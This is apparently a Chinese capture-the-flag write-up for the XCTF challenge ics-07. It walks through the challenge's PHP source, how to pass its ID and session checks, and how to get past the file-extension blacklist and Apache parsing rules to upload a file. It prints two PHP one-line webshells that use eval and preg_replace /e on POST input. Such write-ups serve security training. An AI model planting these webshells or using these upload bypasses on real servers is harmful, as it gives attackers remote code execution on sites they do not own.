【攻防世界】ics-07

php 复制代码
<?php
session_start();

if (!isset($_GET[page])) {
  show_source(__FILE__);
  die();
}

if (isset($_GET[page]) && $_GET[page] != 'index.php') {
  include('flag.php');
}else {
  header('Location: ?page=flag.php');
}
php 复制代码
<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
           die("Bad file extension");
       }else{
           chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
?>  //文件上传

(1)if ($_SESSION['admin']):判断 session 中的 admin 是否有值。有的话就继续向下执行。

session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量。UID 存储在 cookie 中,或者通过 URL 进行传导。 用于存储关于用户会话的信息。

(2) preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename):

.+:匹配一个或多个任意字符

匹配 ".php"、".php3"、".php4"、".php5"、".php7"、".phpt" 或 ".phtml" 结尾的文件名 。

chdir() 函数:改变当前的目录。

php 复制代码
<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9')             
      {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
?> //如果查询正确,会得到一个admin的session

(1)floatval(_GET\[id\]) !== '1' \&\& substr(_GET[id], -1) === '9':

floatval为浮点数,肯定与字符串不相等;第一个要为1,最后一个数字要为9。

floatval 函数:

用于获取变量的浮点值。从左到右,碰到不是数字(第一个小数点可以)就截止。
mysqli_real_escape_string() 函数:

转义在 SQL 语句中使用的字符串中的特殊字符。去掉双引号、单引号,防止sql注入。

php文件后缀绕过:

(1)php的解释器绕过

php、php3、php4、php5、php7、phtml、pht、phs、shtml、pwml

(2)apache2.x解析漏洞(从右至左找)

1.php.1 或者 1.php/.

/.表示调用1.php文件本身 。一个点调用最后面的文件,两个点调用第一个文件。
一句话木马:

php 复制代码
 <?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>
php 复制代码
<?php eval($_POST['a']) ?>

下面考虑如何上传木马文件。这里利用Linux的一个目录结构特性。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹

Web安全攻防世界09 ics-07(XCTF)-CSDN博客

相关推荐
萨格拉斯救世主30 分钟前
戴尔R930服务器增加 Intel X710-DA2双万兆光口含模块
运维·服务器
无所谓จุ๊บ31 分钟前
树莓派开发相关知识十 -小试服务器
服务器·网络·树莓派
Jtti33 分钟前
Windows系统服务器怎么设置远程连接?详细步骤
运维·服务器·windows
yeyuningzi1 小时前
Debian 12环境里部署nginx步骤记录
linux·运维·服务器
EasyCVR2 小时前
萤石设备视频接入平台EasyCVR多品牌摄像机视频平台海康ehome平台(ISUP)接入EasyCVR不在线如何排查?
运维·服务器·网络·人工智能·ffmpeg·音视频
YUJIANYUE3 小时前
PHP将指定文件夹下多csv文件[即多表]导入到sqlite单文件
jvm·sqlite·php
龙哥说跨境3 小时前
如何利用指纹浏览器爬虫绕过Cloudflare的防护?
服务器·网络·python·网络爬虫
pk_xz1234565 小时前
Shell 脚本中变量和字符串的入门介绍
linux·运维·服务器
小珑也要变强5 小时前
Linux之sed命令详解
linux·运维·服务器
海绵波波1075 小时前
Webserver(4.3)TCP通信实现
服务器·网络·tcp/ip